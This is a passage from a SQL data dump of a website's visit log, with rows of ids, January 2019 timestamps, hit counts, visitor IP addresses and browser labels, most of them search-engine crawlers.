,0,'5.45.207.79','other'),(372185,1547711698,3,3,0,0,'178.154.244.11','other'),(372186,1547711740,1,1,0,0,'95.163.255.167','other'),(372187,1547712365,3,3,0,0,'141.8.142.103','other'),(372188,1547712423,4,4,0,0,'216.244.66.241','other'),(372189,1547712507,1,1,0,0,'95.163.255.99','other'),(372190,1547712599,2,2,0,0,'5.45.207.79','other'),(372191,1547712783,3,3,0,0,'5.45.207.19','other'),(372192,1547712832,1,1,0,0,'54.36.148.224','other'),(372193,1547712846,1,1,0,0,'54.36.148.239','other'),(372194,1547713799,1,1,0,0,'46.229.168.139','other'),(372195,1547713885,1,1,0,0,'40.77.167.28','other'),(372196,1547713933,1,1,0,0,'66.249.69.145','chrome'),(372198,1547713952,1,1,0,0,'54.36.148.123','other'),(372199,1547714173,1,1,0,0,'141.8.142.103','other'),(372200,1547714196,1,1,0,0,'54.36.149.57','other'),(372201,1547714225,1,1,0,0,'77.111.244.240','chrome'),(372202,1547714468,1,1,0,0,'54.36.148.198','other'),(372203,1547714528,1,1,0,0,'54.36.148.244','other'),(372204,1547714546,1,1,0,0,'95.163.255.174','other'),(372205,1547714661,1,1,0,0,'54.36.149.24','other'),(372206,1547714812,1,1,0,0,'54.36.149.89','other'),(372207,1547714928,1,1,0,0,'31.184.238.190','chrome'),(372208,1547715174,14,14,0,0,'216.244.66.241','other'),(372209,1547715773,1,1,0,0,'40.77.167.96','other'),(372210,1547715852,1,1,0,0,'95.135.17.95','firefox'),(372211,1547715896,1,1,0,0,'66.249.69.148','chrome'),(372212,1547716124,1,1,0,0,'54.36.148.255','other'),(372213,1547716178,1,1,0,0,'31.43.12.240','chrome'),(372214,1547716241,1,1,0,0,'46.229.168.152','other'),(372215,1547716340,1,1,0,0,'54.36.148.52','other'),(372216,1547716513,1,1,0,0,'95.163.255.97','other'),(372217,1547716602,2,2,0,0,'216.244.66.241','other'),(372218,1547716748,1,1,0,0,'46.229.168.149','other'),(372219,1547716882,1,1,0,0,'95.163.255.160','other'),(372220,1547716960,2,2,0,0,'54.36.148.106','other'),(372221,1547717821,2,2,0,0,'91.196.178.87','chrome'),(372222,1547717929,1,1,0,0,'66.249.69.148','chrome'),(372223,1547717996,1,1,0,0,'95.163.255.175','other'),(372224,1547717999,1,1,0,0,'95.163.255.191','other'),(372225,1547718027,10,10,0,0,'216.244.66.241','other'),(372226,1547718256,1,1,0,0,'95.163.255.93','other'),(372227,1547718258,1,1,0,0,'95.163.255.98','other'),(372228,1547718676,1,1,0,0,'91.225.4.21','chrome'),(372229,1547718730,1,1,0,0,'54.36.148.122','other'),(372230,1547718911,1,1,0,0,'66.249.69.202','chrome'),(372231,1547719146,4,4,0,0,'216.244.66.241','other'),(372232,1547719264,3,3,0,0,'178.251.106.252','firefox'),(372233,1547719432,1,1,0,0,'46.229.168.130','other'),(372234,1547719440,2,2,0,0,'91.196.179.33','chrome'),(372235,1547719793,1,1,0,0,'46.229.168.150','other'),(372236,1547719920,1,1,0,0,'54.36.149.55','other'),(372237,1547720136,1,1,0,0,'54.36.149.104','other'),(372238,1547720262,1,1,0,0,'66.249.69.143','chrome'),(372240,1547720397,1,1,0,0,'54.36.148.130','other'),(372241,1547720465,1,1,0,0,'66.249.69.202','chrome'),(372242,1547720513,1,1,0,0,'66.249.69.148','chrome'),(372243,1547720623,1,1,0,0,'130.180.209.41','chrome'),(372244,1547720636,1,1,0,0,'54.36.149.95','other'),(372245,1547720761,1,1,0,0,'40.77.167.80','other'),(372246,1547720769,1,1,0,0,'95.163.255.97','other'),(372247,1547720773,1,1,0,0,'141.8.142.103','other'),(372248,1547720798,2,2,0,0,'95.163.255.98','other'),(372249,1547720834,12,12,0,0,'216.244.66.241','other'),(372250,1547720847,1,1,0,0,'207.46.13.105','other'),(372251,1547720920,1,1,0,0,'95.163.255.93','other'),(372252,1547721036,2,2,0,0,'207.46.13.52','other'),(372253,1547721223,1,1,0,0,'8.29.198.26','other'),(372254,1547721717,1,0,1,0,'66.249.69.144',''),(372255,1547721720,1,0,1,0,'66.249.69.148',''),(372256,1547721855,2,2,0,0,'216.244.66.241','other'),(372257,1547721970,2,2,0,0,'91.196.178.87','chrome'),(372258,1547722041,2,2,0,0,'91.124.182.170','firefox'),(372259,1547722189,1,1,0,0,'54.36.148.26','other'),(372260,1547722249,1,1,0,0,'95.163.255.178','other'),(372261,1547722348,1,1,0,0,'54.36.148.163','other'),(372262,1547722427,2,2,0,0,'95.163.255.92','other'),(372263,1547722465,1,1,0,0,'8.29.198.26','other'),(372264,1547722536,4,4,0,0,'91.196.178.85','chrome'),(372265,1547722540,1,1,0,0,'37.53.123.48','chrome'),(372266,1547722749,1,1,0,0,'54.36.148.79','other'),(372267,1547723158,1,1,0,0,'46.229.168.152','other'),(372268,1547723159,1,1,0,0,'46.229.168.137','other'),(372269,1547723459,1,1,0,0,'66.249.69.149','chrome'),(372270,1547723683,12,12,0,0,'216.244.66.241','other'),(372271,1547723723,1,1,0,0,'40.77.167.96','other'),(372272,1547723764,1,1,0,0,'66.249.75.16','chrome'),(372273,1547723772,1,1,0,0,'207.46.13.74','other'),(372274,1547723897,1,1,0,0,'95.163.255.96','other'),(372275,1547724064,1,1,0,0,'66.249.75.15','chrome'),(372277,1547724149,1,1,0,0,'46.229.168.133','other'),(372278,1547724381,2,2,0,0,'91.196.178.79','chrome'),(372279,1547724384,2,2,0,0,'66.249.75.20','chrome'),(372280,1547724746,1,1,0,0,'54.36.148.245','other'),(372281,1547724845,1,1,0,0,'54.36.149.25','other'),(372282,1547725147,1,1,0,0,'46.200.252.148','chrome'),(372283,1547725192,1,1,0,0,'66.249.75.17','chrome'),(372284,1547725265,1,1,0,0,'54.36.148.135','other'),(372285,1547725408,1,1,0,0,'66.249.69.219','chrome'),(372286,1547725409,1,1,0,0,'66.249.69.204','chrome'),(372287,1547725549,1,1,0,0,'216.244.66.241','other'),(372288,1547725831,1,1,0,0,'46.229.168.154','other'),(372289,1547726386,1,1,0,0,'5.45.207.79','other'),(372290,1547726398,1,1,0,0,'95.163.255.96','other'),(372291,1547726408,1,1,0,0,'95.163.255.94','other'),(372292,1547726451,5,5,0,0,'216.244.66.241','other'),(372293,1547726473,1,1,0,0,'66.249.69.200','chrome'),(372294,1547726495,1,1,0,0,'54.36.149.65','other'),(372295,1547726563,1,1,0,0,'37.144.52.194','chrome'),(372296,1547726717,1,1,0,0,'66.249.75.22','chrome'),(372297,1547727114,1,1,0,0,'66.249.69.217','chrome'),(372299,1547727370,2,2,0,0,'216.244.66.241','other'),(372300,1547727392,1,1,0,0,'46.229.168.143','other'),(372301,1547727394,1,1,0,0,'46.229.168.129','other'),(372302,1547727558,1,1,0,0,'178.154.171.27','other'),(372303,1547727564,3,3,0,0,'141.8.142.103','other'),(372304,1547727576,2,2,0,0,'178.154.171.24','other'),(372305,1547727580,3,3,0,0,'66.249.75.20','chrome'),(372306,1547727729,1,1,0,0,'178.154.244.11','other'),(372307,1547727829,1,1,0,0,'54.36.149.106','other'),(372308,1547727889,1,1,0,0,'87.250.224.65','other'),(372309,1547727898,1,1,0,0,'5.45.207.19','other'),(372310,1547728032,1,1,0,0,'54.36.149.13','other'),(372311,1547728129,1,1,0,0,'5.58.46.252','chrome'),(372312,1547728132,1,1,0,0,'66.249.75.21','chrome'),(372313,1547728180,1,1,0,0,'46.229.168.134','other'),(372314,1547728182,1,1,0,0,'46.229.168.137','other'),(372315,1547728334,1,1,0,0,'87.250.224.47','other'),(372316,1547728343,2,2,0,0,'91.196.177.46','chrome'),(372317,1547728404,1,1,0,0,'37.9.113.148','other'),(372318,1547728806,1,1,0,0,'95.163.255.171','other'),(372319,1547728809,1,1,0,0,'95.163.255.189','other'),(372320,1547728814,1,1,0,0,'40.77.167.28','other'),(372321,1547728868,1,1,0,0,'77.52.212.66','chrome'),(372322,1547728929,1,1,0,0,'54.36.149.79','other'),(372323,1547728947,1,1,0,0,'66.249.75.20','chrome'),(372324,1547729004,1,1,0,0,'141.8.142.103','other'),(372325,1547729032,1,1,0,0,'46.229.168.148','other'),(372326,1547729130,4,4,0,0,'178.154.244.11','other'),(372327,1547729187,1,1,0,0,'54.36.149.14','other'),(372328,1547729235,8,8,0,0,'216.244.66.241','other'),(372329,1547729461,2,2,0,0,'5.45.207.19','other'),(372330,1547729528,1,1,0,0,'207.46.13.160','other'),(372331,1547729531,1,1,0,0,'95.108.213.4','other'),(372332,1547729651,1,1,0,0,'91.196.178.97','chrome'),(372333,1547729873,2,2,0,0,'66.249.75.22','chrome'),(372334,1547729889,1,1,0,0,'91.217.61.5','chrome'),(372335,1547729905,1,1,0,0,'5.45.207.79','other'),(372336,1547730228,1,1,0,0,'31.184.238.56','chrome'),(372337,1547730249,1,1,0,0,'54.36.148.105','other'),(372338,1547730277,1,1,0,0,'178.154.244.11','other'),(372339,1547730324,1,1,0,0,'54.36.149.57','other'),(372340,1547730394,1,1,0,0,'54.36.148.239','other'),(372341,1547730534,1,1,0,0,'37.73.123.88','chrome'),(372342,1547730895,1,1,0,0,'40.77.167.28','other'),(372343,1547730918,1,1,0,0,'141.8.142.103','other'),(372344,1547730979,1,1,0,0,'46.229.168.149','other'),(372345,1547731071,1,1,0,0,'95.163.255.181','other'),(372346,1547731239,1,1,0,0,'95.163.255.195','other'),(372347,1547731247,1,1,0,0,'95.163.255.183','other'),(372348,1547731885,2,2,0,0,'66.249.75.21','chrome'),(372349,1547731895,1,1,0,0,'54.36.149.12','other'),(372350,1547731899,2,2,0,0,'66.249.75.20','chrome'),(372351,1547731927,1,1,0,0,'66.249.75.22','chrome'),(372352,1547731981,2,2,0,0,'91.196.178.131','firefox'),(372353,1547732016,12,12,0,0,'216.244.66.241','other'),(372354,1547732057,1,1,0,0,'8.29.198.26','other'),(372355,1547732109,4,4,0,0,'37.52.108.190','chrome'),(372356,1547732208,1,1,0,0,'95.163.255.94','other'),(372357,1547732910,1,1,0,0,'46.229.168.151','other'),(372358,1547732983,1,1,0,0,'46.229.168.134','other'),(372359,1547733268,1,1,0,0,'54.36.149.12','other'),(372360,1547733325,1,1,0,0,'8.29.198.27','other'),(372361,1547733526,1,1,0,0,'54.36.149.29','other'),(372362,1547733559,1,1,0,0,'216.244.66.241','other'),(372363,1547733583,1,1,0,0,'95.163.255.92','other'),(372364,1547733736,1,1,0,0,'54.36.148.254','other'),(372365,1547734261,1,1,0,0,'54.36.148.227','other'),(372366,1547734264,2,2,0,0,'66.249.75.21','chrome'),(372367,1547734558,1,1,0,0,'46.229.168.154','other'),(372368,1547734596,1,1,0,0,'66.249.75.22','chrome'),(372369,1547734622,1,1,0,0,'66.249.69.202','chrome'),(372370,1547734783,1,1,0,0,'46.229.168.140','other'),(372371,1547734820,7,7,0,0,'216.244.66.241','other'),(372372,1547735115,2,2,0,0,'66.249.75.20','chrome'),(372373,1547735173,1,1,0,0,'40.77.167.100','other'),(372374,1547735262,1,1,0,0,'66.249.75.21','chrome'),(372375,1547735364,1,1,0,0,'54.36.149.92','other'),(372376,1547735366,1,1,0,0,'95.163.255.94','other'),(372377,1547735532,1,1,0,0,'93.77.238.23','chrome'),(372378,1547735728,1,1,0,0,'54.36.148.241','other'),(372379,1547735857,10,10,0,0,'216.244.66.241','other'),(372380,1547736307,1,1,0,0,'54.36.148.172','other'),(372381,1547736348,1,1,0,0,'54.36.149.48','other'),(372382,1547736527,1,1,0,0,'95.163.255.161','other'),(372383,1547736530,1,1,0,0,'95.163.255.165','other'),(372384,1547736543,1,1,0,0,'66.249.69.204','chrome'),(372385,1547736828,5,5,0,0,'216.244.66.241','other'),(372386,1547736899,1,1,0,0,'40.77.167.87','other'),(372387,1547737165,1,1,0,0,'54.36.148.253','other'),(372388,1547737453,1,1,0,0,'54.36.149.13','other'),(372389,1547737465,1,1,0,0,'54.36.148.23','other'),(372390,1547737473,1,1,0,0,'95.163.255.186','other'),(372391,1547737504,1,1,0,0,'66.249.69.204','chrome'),(372392,1547737635,1,1,0,0,'95.163.255.158','other'),(372393,1547737657,2,2,0,0,'66.249.69.202','chrome'),(372394,1547737742,2,2,0,0,'95.163.255.93','other'),(372395,1547737767,1,1,0,0,'54.36.149.8','other'),(372396,1547737806,1,1,0,0,'95.163.255.155','other'),(372397,1547737836,11,11,0,0,'216.244.66.241','other'),(372398,1547738223,1,1,0,0,'54.36.148.156','other'),(372399,1547738320,1,1,0,0,'91.196.178.170','chrome'),(372400,1547738509,1,1,0,0,'54.36.148.224','other'),(372401,1547738691,1,1,0,0,'54.36.148.219','other'),(372402,1547738762,5,5,0,0,'216.244.66.241','other'),(372403,1547738796,1,1,0,0,'95.163.255.155','other'),(372404,1547738889,1,1,0,0,'54.36.148.217','other'),(372405,1547738906,1,1,0,0,'91.217.61.5','chrome'),(372406,1547738977,1,1,0,0,'95.163.255.188','other'),(372407,1547738979,1,1,0,0,'54.36.148.93','other'),(372408,1547739163,1,1,0,0,'95.163.255.186','other'),(372409,1547739329,1,1,0,0,'95.163.255.96','other'),(372410,1547739430,1,1,0,0,'207.46.13.73','other'),(372411,1547740054,1,1,0,0,'46.229.168.151','other'),(372412,1547740411,10,10,0,0,'216.244.66.241','other'),(372413,1547740473,2,2,0,0,'176.100.24.212','firefox'),(372414,1547740735,1,1,0,0,'66.249.75.20','chrome'),(372415,1547741017,1,1,0,0,'207.46.13.73','other'),(372416,1547741278,1,1,0,0,'54.36.149.11','other'),(372417,1547741312,3,3,0,0,'216.244.66.241','other'),(372418,1547741601,1,1,0,0,'46.229.168.134','other'),(372419,1547741696,1,1,0,0,'66.249.75.17','chrome'),(372420,1547741697,2,2,0,0,'66.249.75.22','chrome'),(372421,1547741798,1,1,0,0,'157.55.39.221','other'),(372422,1547742209,1,1,0,0,'46.229.168.145','other'),(372423,1547742226,1,1,0,0,'91.196.178.170','chrome'),(372424,1547742325,2,2,0,0,'216.244.66.241','other'),(372425,1547742406,1,1,0,0,'95.163.255.176','other'),(372426,1547742409,1,1,0,0,'95.163.255.178','other'),(372427,1547742876,2,2,0,0,'91.196.178.77','firefox'),(372428,1547742901,1,1,0,0,'8.29.198.25','other'),(372429,1547743324,1,1,0,0,'157.55.39.221','other'),(372430,1547743328,2,2,0,0,'91.196.178.170','chrome'),(372431,1547743339,1,1,0,0,'40.77.167.87','other'),(372432,1547743381,1,1,0,0,'95.163.255.93','other'),(372433,1547743397,5,5,0,0,'216.244.66.241','other'),(372434,1547743729,1,1,0,0,'66.249.69.200','chrome'),(372435,1547744150,1,1,0,0,'95.163.255.169','other'),(372436,1547744165,1,1,0,0,'95.163.255.180','other'),(372437,1547744171,1,1,0,0,'8.29.198.27','other'),(372438,1547744307,3,3,0,0,'216.244.66.241','other'),(372439,1547744349,1,1,0,0,'66.249.75.15','chrome'),(372441,1547744720,1,1,0,0,'46.229.168.139','other'),(372442,1547744852,2,2,0,0,'40.77.167.100','other'),(372443,1547745181,1,1,0,0,'54.36.149.97','other'),(372444,1547745205,2,2,0,0,'91.196.178.68','firefox'),(372445,1547745247,2,2,0,0,'216.244.66.241','other'),(372446,1547745277,1,1,0,0,'40.77.167.87','other'),(372447,1547745554,1,1,0,0,'54.36.148.197','other'),(372448,1547745571,1,1,0,0,'54.36.148.113','other'),(372449,1547745737,1,1,0,0,'46.229.168.137','other'),(372450,1547746166,1,1,0,0,'66.249.75.20','chrome'),(372451,1547746590,8,8,0,0,'216.244.66.241','other'),(372452,1547746654,1,1,0,0,'54.36.149.70','other'),(372453,1547747330,1,1,0,0,'54.36.148.178','other'),(372454,1547747334,1,1,0,0,'40.77.167.87','other'),(372455,1547747771,1,1,0,0,'54.36.149.105','other'),(372456,1547748206,1,1,0,0,'95.163.255.194','other'),(372457,1547748221,1,1,0,0,'54.36.148.231','other'),(372458,1547748308,1,1,0,0,'95.163.255.159','other'),(372459,1547748310,1,1,0,0,'95.163.255.158','other'),(372460,1547748362,1,1,0,0,'95.163.255.151','other'),(372461,1547748460,1,1,0,0,'195.238.117.205','chrome'),(372462,1547748700,1,1,0,0,'54.36.148.97','other'),(372463,1547748713,1,1,0,0,'54.36.148.242','other'),(372464,1547748838,7,7,0,0,'216.244.66.241','other'),(372465,1547748877,1,1,0,0,'54.36.149.12','other'),(372466,1547748930,1,1,0,0,'95.163.255.160','other'),(372467,1547748933,1,1,0,0,'95.163.255.183','other'),(372468,1547748990,1,1,0,0,'178.154.171.24','other'),(372469,1547749002,1,1,0,0,'54.36.148.64','other'),(372470,1547749028,1,1,0,0,'95.163.255.96','other'),(372471,1547749285,1,1,0,0,'40.77.167.100','other'),(372472,1547749306,1,1,0,0,'66.249.75.22','chrome'),(372473,1547749339,1,1,0,0,'40.77.167.87','other'),(372474,1547749565,1,1,0,0,'46.229.168.144','other'),(372475,1547749968,4,4,0,0,'216.244.66.241','other'),(372476,1547750455,1,1,0,0,'54.36.148.213','other'),(372477,1547750459,1,1,0,0,'54.36.149.26','other'),(372478,1547750498,1,1,0,0,'66.249.75.20','chrome'),(372479,1547750619,2,2,0,0,'46.211.26.89','chrome'),(372480,1547750693,1,1,0,0,'40.77.167.101','other'),(372481,1547751195,1,1,0,0,'54.36.148.63','other'),(372482,1547751233,1,1,0,0,'66.249.75.17','chrome'),(372483,1547751419,1,1,0,0,'40.77.167.18','other'),(372484,1547751594,1,1,0,0,'54.36.148.39','other'),(372485,1547751654,9,9,0,0,'216.244.66.241','other'),(372486,1547751707,1,1,0,0,'66.249.75.22','chrome'),(372487,1547751805,1,1,0,0,'195.60.228.42','firefox'),(372488,1547751956,1,1,0,0,'95.163.255.105','other'),(372489,1547751982,1,1,0,0,'95.163.255.113','other'),(372490,1547752084,2,2,0,0,'40.77.167.100','other'),(372491,1547752149,1,1,0,0,'54.36.148.190','other'),(372492,1547752264,1,1,0,0,'54.36.148.208','other'),(372493,1547752330,1,1,0,0,'54.36.148.245','other'),(372494,1547752487,1,1,0,0,'54.36.149.41','other'),(372495,1547752598,5,5,0,0,'216.244.66.241','other'),(372496,1547753000,1,1,0,0,'54.36.148.173','other'),(372497,1547753397,1,1,0,0,'66.249.75.20','chrome'),(372498,1547753480,1,1,0,0,'54.36.148.127','other'),(372499,1547753510,1,1,0,0,'54.36.148.129','other'),(372500,1547753554,1,1,0,0,'66.249.75.22','chrome'),(372501,1547753560,1,1,0,0,'66.249.69.202','chrome'),(372502,1547753745,1,1,0,0,'8.29.198.26','other'),(372503,1547754415,1,1,0,0,'66.249.69.200','chrome'),(372504,1547754448,2,2,0,0,'216.244.66.241','other'),(372505,1547754664,1,1,0,0,'95.163.255.92','other'),(372506,1547754666,1,1,0,0,'95.163.255.95','other'),(372507,1547754887,1,1,0,0,'54.36.148.128','other'),(372508,1547755022,1,1,0,0,'8.29.198.26','other'),(372509,1547755045,1,1,0,0,'66.249.69.202','chrome'),(372510,1547755184,2,2,0,0,'66.249.75.20','chrome'),(372511,1547755326,1,1,0,0,'95.163.255.153','other'),(372512,1547755589,1,1,0,0,'66.249.75.15','chrome'),(372513,1547755665,1,1,0,0,'46.229.168.129','other'),(372514,1547755721,2,2,0,0,'216.244.66.241','other'),(372515,1547755774,1,1,0,0,'173.212.240.51','chrome'),(372516,1547756172,1,1,0,0,'95.163.255.150','other'),(372517,1547756301,1,1,0,0,'54.36.148.194','other'),(372518,1547756585,3,3,0,0,'5.45.207.79','other'),(372519,1547756702,1,1,0,0,'54.36.148.203','other'),(372520,1547756801,1,1,0,0,'37.53.230.127','chrome'),(372521,1547756874,1,1,0,0,'46.229.168.150','other'),(372522,1547756927,2,2,0,0,'5.45.207.19','other'),(372523,1547757195,1,1,0,0,'54.36.148.183','other'),(372524,1547757249,6,6,0,0,'216.244.66.241','other'),(372525,1547757823,1,1,0,0,'66.249.75.20','chrome'),(372526,1547757855,1,1,0,0,'40.77.167.87','other'),(372527,1547758217,5,5,0,0,'216.244.66.241','other'),(372528,1547758338,1,1,0,0,'54.36.148.77','other'),(372529,1547758402,3,3,0,0,'66.249.75.22','chrome'),(372530,1547758414,1,1,0,0,'54.36.148.68','other'),(372531,1547758494,2,2,0,0,'66.249.75.21','chrome'),(372532,1547758644,1,1,0,0,'66.249.75.17','chrome'),(372533,1547758740,1,1,0,0,'95.163.255.159','other'),(372534,1547758988,1,1,0,0,'54.36.148.171','other'),(372535,1547759337,1,1,0,0,'46.229.168.143','other'),(372536,1547759395,1,1,0,0,'46.229.168.152','other'),(372537,1547759457,1,1,0,0,'66.249.75.21','chrome'),(372538,1547759681,1,1,0,0,'54.36.148.27','other'),(372539,1547759786,1,1,0,0,'46.229.168.136','other'),(372540,1547759790,1,1,0,0,'66.249.69.219','chrome'),(372541,1547759791,1,1,0,0,'66.249.69.204','chrome'),(372542,1547759999,1,1,0,0,'54.36.148.216','other'),(372543,1547760040,7,7,0,0,'216.244.66.241','other'),(372544,1547760727,1,1,0,0,'40.77.167.100','other'),(372545,1547760832,1,1,0,0,'54.36.149.60','other'),(372546,1547760882,1,1,0,0,'46.211.67.143','chrome'),(372547,1547760971,1,1,0,0,'54.36.149.34','other'),(372548,1547761050,7,7,0,0,'216.244.66.241','other'),(372549,1547761086,2,2,0,0,'66.249.75.16','chrome'),(372551,1547761419,1,1,0,0,'40.77.167.52','other'),(372552,1547761660,1,1,0,0,'46.229.168.153','other'),(372553,1547761743,1,1,0,0,'5.45.207.19','other'),(372556,1547761744,1,1,0,0,'87.250.224.47','other'),(372557,1547761868,1,1,0,0,'66.249.75.21','chrome'),(372558,1547761902,1,1,0,0,'54.36.148.11','other'),(372559,1547762123,1,1,0,0,'54.36.148.246','other'),(372560,1547762750,1,1,0,0,'54.36.148.187','other'),(372561,1547762760,1,1,0,0,'46.229.168.133','other'),(372562,1547762980,1,1,0,0,'216.244.66.241','other'),(372563,1547763464,1,1,0,0,'54.36.149.46','other'),(372564,1547763781,1,1,0,0,'46.229.168.137','other'),(372565,1547763933,1,1,0,0,'54.36.149.6','other'),(372566,1547763972,8,8,0,0,'216.244.66.241','other'),(372567,1547764257,1,1,0,0,'46.229.168.153','other'),(372568,1547764261,1,1,0,0,'46.229.168.132','other'),(372569,1547764284,1,1,0,0,'54.36.148.210','other'),(372570,1547764382,1,1,0,0,'95.163.255.157','other'),(372571,1547764455,1,1,0,0,'54.36.148.143','other'),(372572,1547764483,2,2,0,0,'66.249.75.20','chrome'),(372573,1547764575,1,1,0,0,'54.36.148.22','other'),(372574,1547764583,1,1,0,0,'8.29.198.26','other'),(372575,1547764631,1,1,0,0,'40.77.167.100','other'),(372576,1547764707,1,1,0,0,'54.36.149.105','other'),(372577,1547765048,1,1,0,0,'46.229.168.133','other'),(372578,1547765209,1,1,0,0,'54.36.149.13','other'),(372579,1547765211,1,1,0,0,'66.249.75.17','chrome'),(372580,1547765213,1,1,0,0,'66.249.75.22','chrome'),(372581,1547765325,1,1,0,0,'95.163.255.173','other'),(372582,1547765329,1,1,0,0,'46.229.168.145','other'),(372583,1547765330,1,1,0,0,'95.163.255.190','other'),(372584,1547765375,1,1,0,0,'54.36.149.31','other'),(372585,1547765515,1,1,0,0,'95.163.255.192','other'),(372586,1547765517,1,1,0,0,'95.163.255.186','other'),(372587,1547765560,1,1,0,0,'54.36.148.236','other'),(372588,1547765731,1,1,0,0,'104.155.179.226','other'),(372589,1547765797,12,12,0,0,'216.244.66.241','other'),(372590,1547765865,1,1,0,0,'8.29.198.26','other'),(372591,1547765958,1,1,0,0,'46.229.168.136','other'),(372592,1547766357,2,2,0,0,'66.249.75.22','chrome'),(372593,1547766392,1,1,0,0,'66.249.75.16','chrome'),(372594,1547766548,1,1,0,0,'95.163.255.184','other'),(372595,1547766652,1,1,0,0,'95.163.255.152','other'),(372596,1547766743,5,5,0,0,'216.244.66.241','other'),(372597,1547766776,1,1,0,0,'95.163.255.108','other'),(372598,1547766842,1,1,0,0,'95.163.255.174','other'),(372599,1547767058,2,2,0,0,'95.163.255.102','other'),(372600,1547767067,1,1,0,0,'95.163.255.183','other'),(372601,1547767069,1,1,0,0,'95.163.255.168','other'),(372602,1547767132,1,1,0,0,'54.36.148.151','other'),(372603,1547767179,1,1,0,0,'54.36.148.128','other'),(372604,1547767248,1,1,0,0,'95.163.255.115','other'),(372605,1547767324,1,1,0,0,'95.163.255.109','other'),(372606,1547767369,1,1,0,0,'95.163.255.118','other'),(372607,1547767717,3,3,0,0,'216.244.66.241','other'),(372608,1547767860,1,1,0,0,'54.36.148.99','other'),(372609,1547767904,1,1,0,0,'54.36.148.91','other'),(372610,1547768041,1,1,0,0,'40.77.167.51','other'),(372611,1547768123,1,1,0,0,'54.36.149.91','other'),(372612,1547768170,2,2,0,0,'87.250.224.47','other'),(372613,1547768201,2,2,0,0,'5.45.207.79','other'),(372614,1547768387,1,1,0,0,'54.165.59.7','other'),(372615,1547768577,1,1,0,0,'5.45.207.19','other'),(372616,1547768618,4,4,0,0,'216.244.66.241','other'),(372617,1547768652,1,1,0,0,'54.36.148.92','other'),(372618,1547769008,1,1,0,0,'66.249.69.145','chrome'),(372619,1547769009,2,2,0,0,'66.249.69.148','chrome'),(372620,1547769118,1,1,0,0,'141.8.142.103','other'),(372621,1547769293,1,1,0,0,'54.36.148.27','other'),(372622,1547769304,2,2,0,0,'5.45.207.79','other'),(372623,1547769345,1,1,0,0,'54.36.148.241','other'),(372624,1547769419,2,2,0,0,'66.249.69.149','chrome'),(372625,1547769486,3,3,0,0,'40.77.167.100','other'),(372626,1547769650,1,1,0,0,'54.36.148.12','other'),(372627,1547769879,4,4,0,0,'216.244.66.241','other'),(372628,1547769913,1,1,0,0,'95.163.255.167','other'),(372629,1547769940,1,1,0,0,'46.229.168.142','other'),(372630,1547770018,1,1,0,0,'54.36.148.11','other'),(372631,1547770038,1,1,0,0,'54.36.148.86','other'),(372632,1547770351,2,2,0,0,'46.229.168.132','other'),(372633,1547770453,1,1,0,0,'95.163.255.192','other'),(372634,1547770678,1,1,0,0,'54.165.59.7','other'),(372635,1547770722,1,1,0,0,'54.36.148.78','other'),(372636,1547771434,1,1,0,0,'66.249.69.204','chrome'),(372637,1547771470,7,7,0,0,'216.244.66.241','other'),(372638,1547771487,2,2,0,0,'157.55.39.163','other'),(372639,1547771714,1,1,0,0,'54.36.148.172','other'),(372640,1547771928,1,1,0,0,'95.163.255.180','other'),(372641,1547771975,1,1,0,0,'54.36.149.83','other'),(372642,1547772541,1,1,0,0,'54.36.148.80','other'),(372643,1547772620,4,4,0,0,'216.244.66.241','other'),(372644,1547772665,5,5,0,0,'40.77.167.100','other'),(372645,1547772801,1,1,0,0,'54.165.59.7','other'),(372646,1547772931,1,1,0,0,'46.36.38.57','other'),(372647,1547773405,1,1,0,0,'66.249.69.143','chrome'),(372648,1547773406,2,2,0,0,'66.249.69.149','chrome'),(372649,1547773486,1,1,0,0,'5.45.207.19','other'),(372650,1547773835,1,1,0,0,'40.77.167.100','other'),(372651,1547774546,1,1,0,0,'66.249.69.150','chrome'),(372652,1547774592,3,3,0,0,'216.244.66.241','other'),(372653,1547774788,1,1,0,0,'66.249.69.217','chrome'),(372654,1547775025,1,1,0,0,'66.249.69.148','chrome'),(372655,1547775224,1,1,0,0,'54.36.148.158','other'),(372656,1547775364,1,1,0,0,'95.163.255.94','other'),(372657,1547775370,1,1,0,0,'95.163.255.168','other'),(372658,1547775423,1,1,0,0,'8.29.198.26','other'),(372659,1547775435,1,1,0,0,'95.163.255.102','other'),(372660,1547775453,1,1,0,0,'54.36.148.233','other'),(372661,1547775558,1,1,0,0,'95.163.255.103','other'),(372662,1547775685,1,1,0,0,'66.249.69.202','chrome'),(372663,1547775750,1,1,0,0,'54.36.148.247','other'),(372664,1547775924,2,2,0,0,'216.244.66.241','other'),(372665,1547776051,2,2,0,0,'46.229.168.138','other'),(372666,1547776158,1,1,0,0,'54.36.148.210','other'),(372667,1547776308,1,1,0,0,'54.36.148.231','other'),(372668,1547776714,1,1,0,0,'8.29.198.27','other'),(372669,1547777040,6,6,0,0,'216.244.66.241','other'),(372670,1547777149,1,1,0,0,'95.163.255.154','other'),(372671,1547777153,1,1,0,0,'95.163.255.182','other'),(372672,1547777210,1,1,0,0,'40.77.167.142','other'),(372673,1547777225,1,1,0,0,'46.229.168.142','other'),(372674,1547777271,1,1,0,0,'52.13.19.68','chrome'),(372675,1547777283,1,1,0,0,'52.13.19.68','chrome'),(372676,1547777302,1,1,0,0,'66.249.69.149','chrome'),(372677,1547777573,1,1,0,0,'54.36.148.66','other'),(372678,1547777588,1,1,0,0,'54.36.148.147','other'),(372679,1547777971,1,1,0,0,'66.249.69.145','chrome'),(372680,1547777990,1,1,0,0,'66.249.69.148','chrome'),(372681,1547777994,5,5,0,0,'216.244.66.241','other'),(372682,1547778346,1,1,0,0,'40.77.167.142','other'),(372683,1547778438,1,1,0,0,'54.36.149.36','other'),(372684,1547778758,1,1,0,0,'54.36.148.140','other'),(372685,1547779198,1,1,0,0,'54.36.148.118','other'),(372686,1547779329,1,1,0,0,'54.36.149.72','other'),(372687,1547779391,1,1,0,0,'66.249.69.144','chrome'),(372688,1547779392,1,1,0,0,'66.249.69.150','chrome'),(372689,1547779436,2,2,0,0,'95.163.255.97','other'),(372690,1547779654,1,1,0,0,'54.36.148.77','other'),(372691,1547779692,1,1,0,0,'5.45.207.79','other'),(372692,1547779860,16,16,0,0,'216.244.66.241','other'),(372693,1547779883,1,1,0,0,'66.249.69.200','chrome'),(372694,1547780288,2,2,0,0,'66.249.69.145','chrome'),(372696,1547780368,1,1,0,0,'46.229.168.133','other'),(372697,1547780808,8,8,0,0,'216.244.66.241','other'),(372698,1547781063,1,1,0,0,'66.249.69.217','chrome'),(372699,1547781064,1,1,0,0,'66.249.69.204','chrome'),(372700,1547781257,2,2,0,0,'95.163.255.116','other'),(372701,1547781411,1,1,0,0,'95.163.255.118','other'),(372702,1547781464,